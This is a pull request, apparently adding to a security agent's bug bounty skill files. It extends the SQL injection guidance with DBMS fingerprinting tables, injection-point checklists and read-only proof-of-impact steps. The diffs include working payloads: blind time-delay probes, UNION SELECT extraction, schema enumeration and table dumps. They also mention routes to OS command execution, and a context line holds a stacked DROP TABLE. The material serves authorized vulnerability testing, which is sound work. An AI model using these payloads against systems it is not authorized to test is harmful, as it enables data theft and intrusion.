### PR TITLE
Deepen SQLi guidance: DBMS fingerprinting, injection coverage, read-only impact proof

### DIFF
--- a/skills/bug-bounty/SKILL.md
+++ b/skills/bug-bounty/SKILL.md
@@ -761,6 +761,39 @@ SeLeCt * FrOm uSeRs
 ' OR '1'='1
 ```
 
+### Stack → DBMS fingerprint (pick the right payload or you MISS blind/error injections)
+| Tech signal | Likely DBMS | Blind probe |
+|---|---|---|
+| `.asp`/`.aspx`, IIS, ASP.NET error pages | MSSQL | `WAITFOR DELAY '0:0:5'--` |
+| `.php`, Apache/nginx LAMP | MySQL/MariaDB | `SLEEP(5)--` |
+| Java/Spring, `.jsp` | PostgreSQL / MSSQL / Oracle | `pg_sleep(5)` / `WAITFOR` / `dbms_pipe.receive_message('a',5)` |
+| Python (Django/Flask), Rails | PostgreSQL / MySQL | `pg_sleep(5)` / `SLEEP(5)` |
+
+Fingerprint early: `@@version` (MSSQL/MySQL), `version()` (PG), `SELECT banner FROM v$version` (Oracle). A wrong-DBMS payload silently fails — that's a missed bug, not a clean target.
+
+### Where SQLi hides (test every sink, not just the search box)
+- [ ] Every param from recon / `param-discover` — incl. JSON keys, `ORDER BY`/`sort=` columns (can't be parameterized → high-yield), `LIMIT`/`offset`
+- [ ] Headers & cookies looked up in a query (`X-Forwarded-For`, `User-Agent`, session/auth tokens)
+- [ ] Second-order: value stored on one request (profile field, filename), fires in a *later* query — plant `'`/sleep, then watch a different page render
+- [ ] REST/GraphQL filters, export & report generators, autocomplete/"search" endpoints
+
+### Confirm + prove impact (read-only — kills N/A, catches blind)
+```sql
+-- 1. confirm it's REAL (don't stop at one error)
+' AND 1=1--  vs  ' AND 1=2--    → responses differ = boolean oracle = real
+-- 2. column count, then a displayable column
+' ORDER BY 1--  ↑ N until error → N-1 cols
+0' UNION SELECT NULL,'MARKER',NULL--   → find where MARKER renders
+-- 3. prove readable data (ONE value is enough for a valid report)
+0' UNION SELECT NULL,@@version,NULL--               -- MSSQL/MySQL
+0' UNION SELECT NULL,version(),NULL--               -- PostgreSQL
+-- one-request dump when proving a sensitive table:
+-- MySQL GROUP_CONCAT() · MSSQL/PG STRING_AGG() · Oracle LISTAGG()
+```
+SQLi that reads a sensitive row (e.g. a config/credentials table) **is already a valid, high-severity finding** — submit on the readable data, not a lone 500. You do not need RCE.
+
+> **Escalation (conditional — most SQLi stops at data read).** Only if the DB account is `sysadmin`/superuser **and** host exploitation is in program scope does SQLi → OS RCE apply (MSSQL `xp_cmdshell`, PG `COPY…FROM PROGRAM`, MySQL `INTO OUTFILE`). In BBP this is usually out of scope — prove the data read, note escalation potential in Impact, and don't run it.
+
 ## GraphQL
 
 ### Introspection (alone = Informational, but reveals attack surface)

--- a/skills/security-arsenal/METHODOLOGY_CHEATSHEET.md
+++ b/skills/security-arsenal/METHODOLOGY_CHEATSHEET.md
@@ -43,6 +43,8 @@ table during the hunt.
 3. Boolean: `' AND 1=1--` vs `' AND 1=2--` and diff response.
 4. Stacked: `;DROP TABLE` (rarely works but disclosed often as severe even when not).
 5. Use `ghauri` or `sqlmap` with `--level=5 --risk=3` for confirmed time-based.
+6. **Prove it's real & readable (don't stop at error/sleep):** match the DBMS first (`.asp`→MSSQL `WAITFOR`, `.php`→MySQL `SLEEP`, Java/Python→PG `pg_sleep` / Oracle `dbms_pipe`). Then `ORDER BY N` for column count → `UNION SELECT` a displayable col → read ONE value (`@@version`/`version()`/`current_user`, then a sensitive row via `GROUP_CONCAT`/`STRING_AGG`/`LISTAGG`). Reading a sensitive table = valid finding; submit on data, never a 500-only screenshot.
+   - *Escalation (conditional, often out of BBP scope):* only if the DB user is sysadmin/superuser AND host exec is in scope → `xp_cmdshell` / `COPY…FROM PROGRAM` / `INTO OUTFILE`. Note the potential in impact, don't run it.
 
 ### CSRF
 1. Find any state-changing request (POST/PUT/DELETE) without an Authorization header.

--- a/skills/security-arsenal/SKILL.md
+++ b/skills/security-arsenal/SKILL.md
@@ -150,6 +150,21 @@ http://allowed-domain.com/redirect?to=http://169.254.169.254/
 ' UNION SELECT 'a',NULL,NULL--
 ```
 
+### Fingerprint + Prove Readable Data (read-only PoC)
+```sql
+-- pick DBMS by stack: .asp/IIS→MSSQL, .php→MySQL, Java/Python→PG/Oracle
+-- column count first:  ' ORDER BY 1--  ↑ until error = N-1 cols
+0' UNION SELECT NULL,'MARKER',NULL--               -- find a displayable column
+-- fingerprint + identity (ONE readable value = valid finding):
+0' UNION SELECT NULL,@@version,NULL--              -- MSSQL/MySQL
+0' UNION SELECT NULL,version(),NULL--              -- PostgreSQL
+0' UNION SELECT NULL,SYSTEM_USER,NULL--            -- MSSQL (current_user / USER() elsewhere)
+-- schema walk + one-request dump of a sensitive table:
+0' UNION SELECT NULL,TABLE_NAME,NULL FROM INFORMATION_SCHEMA.TABLES--   -- MySQL/MSSQL/PG (Oracle: ALL_TABLES)
+-- MySQL GROUP_CONCAT() · MSSQL/PG STRING_AGG() · Oracle LISTAGG()  → dump in one request
+```
+Reading a credentials/config table is a valid standalone finding — submit on data, not a 500. (DB→OS escalation only if the DB user is sysadmin/superuser AND host exec is in scope.)
+
 ### Blind SQLi (time-based confirmation)
 ```sql
 # MySQL

--- a/skills/web2-vuln-classes/SKILL.md
+++ b/skills/web2-vuln-classes/SKILL.md
@@ -363,6 +363,16 @@ grep -rn "mysql_query\|mysqli_query" --include="*.php" | grep "\$"
 
 **WAF bypass for SQLi**: Run `tools/waf_encoder.py "<payload>" --class sqli` for comment-injection (`SE/**/LECT`), MySQL version comment (`/*!50000 UNION*/`), case-mix (`SeLeCt`), operator substitute (`OR`→`||`, `=`→`LIKE`), whitespace swap (`%0a`, `%0b`, `/**/ `). AWS WAF specifically: try `/**/` between every token. ModSecurity: try `/*!50000 UNION*/` + `%0a` space substitution.
 
+### Stack → DBMS (fingerprint before blind testing, or you miss it)
+| Tech signal | DBMS | Blind probe |
+|---|---|---|
+| `.asp`/IIS/ASP.NET | MSSQL | `WAITFOR DELAY '0:0:5'` |
+| `.php`/LAMP | MySQL/MariaDB | `SLEEP(5)` |
+| Java/Spring, `.jsp` | PG/MSSQL/Oracle | `pg_sleep(5)` / `WAITFOR` / `dbms_pipe.receive_message('a',5)` |
+| Python/Rails | PG/MySQL | `pg_sleep(5)` / `SLEEP(5)` |
+
+**Prove it (read-only):** `ORDER BY N` → column count; `0' UNION SELECT NULL,@@version,NULL--` (or `version()` / `current_user`) → readable data = valid finding. Dump one table in a single request: `GROUP_CONCAT` (MySQL) / `STRING_AGG` (MSSQL 2017+, PG) / `LISTAGG` (Oracle). Reading a credentials/config table is reportable on its own — RCE not required (and DB→OS escalation is usually out of BBP scope: only when the DB user is sysadmin/superuser AND host exec is in scope).
+
 ---
 
 ## 8. OAUTH / OIDC BUGS


### PR DESCRIPTION
## What

Deepens the SQL injection guidance so it covers **finding and confirming** more real injections, not just detecting one. Four skills touched, additive only (60 lines, no deletions):

| File | Change |
|---|---|
| `skills/bug-bounty/SKILL.md` | Stack→DBMS fingerprint table, injection-point checklist (`sort`/`ORDER BY` columns, headers, cookies, second-order, JSON keys), read-only confirm → prove-impact flow |
| `skills/security-arsenal/METHODOLOGY_CHEATSHEET.md` | "Prove it's real & readable" step + conditional escalation line |
| `skills/web2-vuln-classes/SKILL.md` | DBMS fingerprint table + read-only proof one-liner in the SQLi section |
| `skills/security-arsenal/SKILL.md` | Fingerprint + prove-readable-data payload block |

## Why

- **Pick the matching blind probe or miss the bug.** Firing `SLEEP(5)` at an MSSQL backend (which needs `WAITFOR DELAY`) makes a real blind injection read as a clean target. The fingerprint table maps common tech signals (`.asp`/IIS → MSSQL, `.php` → MySQL, Java/Python → PG/Oracle) to the right probe.
- **Test more sinks.** The coverage checklist points at high-yield, often-skipped points: `ORDER BY`/`sort=` columns (can't be parameterized), headers/cookies used in lookups, and second-order paths.
- **Confirm before reporting.** A read-only `boolean → ORDER BY → UNION → one value` flow proves the injection is real and the data is readable — cutting error-only false positives and catching blind cases that a single `'` misses.

## Scope discipline

Reading a credentials/config table is treated as a valid standalone finding — no RCE required. DB→OS escalation (`xp_cmdshell` / `COPY … FROM PROGRAM` / `INTO OUTFILE`) is kept to a single conditional note: only when the DB account is sysadmin/superuser **and** host exploitation is in program scope. Read-only proof is preferred throughout; nothing destructive is added.
